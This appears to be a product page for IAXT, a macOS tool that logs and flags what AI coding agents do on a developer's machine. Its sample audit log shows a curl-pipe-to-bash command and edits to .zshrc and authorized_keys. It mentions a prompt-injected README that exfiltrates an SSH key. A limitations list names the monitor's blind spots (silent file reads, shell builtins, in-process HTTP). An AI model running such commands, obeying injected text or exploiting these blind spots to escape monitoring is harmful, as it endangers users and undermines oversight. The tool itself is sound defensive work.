A quiet menu-bar companion that keeps a faithful record of every command, file change, and system interaction — so you can review it after the session ends, not worry about it during.
AI coding tools routinely execute shell commands and touch your filesystem with broad permissions. macOS permission dialogs create an illusion of control — but over a long session, most of us click through.
IAXT doesn't block. IAXT doesn't restrict. IAXT watches, attributes, and remembers — so you can answer the only question that matters: what did the AI actually do?
Solo developer auditing your own machine, or a founder rolling an audit trail up to the whole team. IAXT fits both — and they care about different things.
Install the app, go back to coding. IAXT sits in your menu bar, logs every AI agent's activity locally, and surfaces a 30-second review screen when you're done.
Catches the accidents (the AI deleted half the repo), flags
the rarer intentional exfil (a prompt-injected README
triggered a curl -X POST on your SSH key), and
stays out of your face the rest of the time.
~/Library/Logs/IAXT/, openable with sqlite3, deletable with rm -rf.
Your engineers install IAXT — same app as the individual tier, no extra friction. Once a day, a review summary (not raw logs) pushes to a central endpoint you control. Your security lead, CTO, or founder sees a per-engineer roll-up.
When a VC asks "how do you manage AI-agent risk?" during due diligence, you open the dashboard. That's the answer. Almost nobody else has this yet — which is why having it now materially supports the fundraise.
We use Claude Code, Cursor, and Aider across the team. Every session is logged locally. Review-tier events — persistence mechanisms, credential access, exfiltration patterns — are flagged automatically and rolled up to our security review. Here's last week's report. — What you tell your lead investor
Commands run, files created or modified, packages installed, git operations, cron entries, launch agents. Every action attributed to the tool that made it — confirmed, likely, or possible.
A gold stripe for actions that deserve attention — filesystem writes outside the project, unexpected network calls, changes to scheduled tasks. Violet for things simply worth a look.
A daily Overview of your AI usage patterns. Session cards, stats, attention items. CSV export for team review. Everything local, no telemetry, no cloud.
Gold marks actions worth flagging. Violet marks rows worth reviewing. Each row carries an attribution pill in plain English.
| Time | Who | Summary | Object | Command / Path | Info | |
|---|---|---|---|---|---|---|
| 09:12:04 | Claude | Session started | ~/Projects/web-app | |||
| 09:12:38 |
Claude
confirmed
|
Checked repo status ×23 | working tree | git status, git rev-parse, git log … | Version control — checks repo state | |
| 09:14:22 |
Claude
confirmed
|
Searched codebase | "handleEvents" in Sources/ | rg -n "handleEvents" Sources/ | Search tool — finds text in files | |
| 09:18:41 |
Claude
confirmed
|
Installed package |
axios
Package installation (npm)
|
npm install axios | Package manager — adds a dependency | |
| 09:20:09 |
Claude
likely
|
Created file | client.ts | Sources/api/client.ts | ||
| 09:24:11 |
Claude
confirmed
|
Committed changes | Add API client module | git commit -m "Add API client module" | Version control — saves changes locally | |
| 09:26:02 |
Claude
confirmed
|
Made executable |
deploy.sh
Made file executable (chmod +x)
|
chmod +x scripts/deploy.sh | Permissions — makes file runnable | |
| 10:58:07 | Claude | Session ended | ||||
| 14:35:18 |
Cursor
likely
|
Modified config |
.zshrc
Shell startup file modified
|
~/.zshrc | Shell config — runs on every terminal open | |
| 14:36:49 |
Cursor
confirmed
|
Ran command |
curl
Pipe to shell — remote code execution
|
curl -sS https://example.com/setup.sh | bash | Downloads and runs remote script | |
| 18:44:57 |
Unverified
possible
|
Modified config |
authorized_keys
SSH authorized_keys modified
|
~/.ssh/authorized_keys | SSH access — controls who can log in |
Transparency cuts both ways. These are structural — anyone claiming otherwise is selling you something. The audit story only works if you believe we won't overpromise, so here's the full list.
Remote sandboxes on vendor infrastructure. No local process touches your machine. IAXT shows a banner when a remote-capable app is running so you know the blind spot exists.
Browser-hosted code generators. Nothing executes locally. Out of scope by design — the chat transcript on the vendor's site is the only audit surface.
IAXT records that files changed, not what
changed. A subtle code-level backdoor looks like any other
edit. Defence: git diff after the session.
macOS FSEvents only fires on writes. A silent read of
~/.ssh/id_rsa is invisible — unless the AI
uses what it read, in which case the curl / POST
/ commit is caught.
export, alias, cd,
source run inside the shell process with no
child process — they're invisible to process-level monitoring.
If an AI app makes HTTP requests from its Electron main
process directly (not via curl / wget
child processes), those calls don't surface.
No measurable impact. IAXT subscribes to macOS's native event streams (FSEvents, kqueue, periodic sysctl) — the OS is already doing this work. We filter for AI-attributable signals and drop roughly 95% of events by construction before anything is written to disk.
Individual tier: zero. No network calls. No telemetry. No analytics. No account. Company tier: once a day, a review summary (counts per agent, flagged/review action totals — no raw commands) goes to the endpoint you control. Nothing to us.
Claude Code, Cursor, Aider, Codex, Windsurf, Kilo Code, OpenCode, Copilot, Cody. New agents are added on request — email us with your tool's process name and we'll add it.
Drag IAXT.app to the Trash, then
rm -rf ~/Library/Logs/IAXT to remove the SQLite
database and audit logs. That's it — no hidden files, no
LaunchAgent to unload.
Apple's Endpoint Security framework catches more (file reads,
every exec) but requires a manual-review
entitlement from Apple and a system-extension install flow.
IAXT v1 runs in user-space because distribution friction
matters more than catching every last event. ES-level
detection is on the roadmap.
Both will be available. During private beta we host it for speed of iteration. Self-hosted ships before GA. If you need self-hosted from day one, tell us — we'll prioritise accordingly.
The Swift app will go open-source under a source-available licence once the team endpoint stabilises. Email for early access.